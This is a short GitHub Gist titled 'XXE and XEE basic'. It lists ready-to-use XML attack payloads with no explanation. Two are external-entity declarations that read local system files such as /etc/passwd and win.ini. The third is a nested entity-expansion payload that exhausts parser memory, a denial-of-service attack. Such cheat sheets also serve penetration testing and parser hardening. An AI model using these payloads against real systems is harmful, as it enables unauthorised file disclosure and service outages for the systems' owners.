Last active
March 20, 2022 19:16
-
-
Save castexyz/37ea65ea5c852ee001fe6b9edbb85355 to your computer and use it in GitHub Desktop.
XXE and XEE basic
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------- | |
| Basic XXE | |
| -------------------------------- | |
| <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> ]> | |
| <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> | |
| -------------------------------- | |
| Basic XEE | |
| -------------------------------- | |
| <!DOCTYPE data [ | |
| <!ENTITY a0 "lol" > | |
| <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;"> | |
| <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;"> | |
| <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;"> | |
| <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;"> | |
| <!ENTITY a5 "&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;"> | |
| <!ENTITY a6 "&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;"> | |
| ]> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment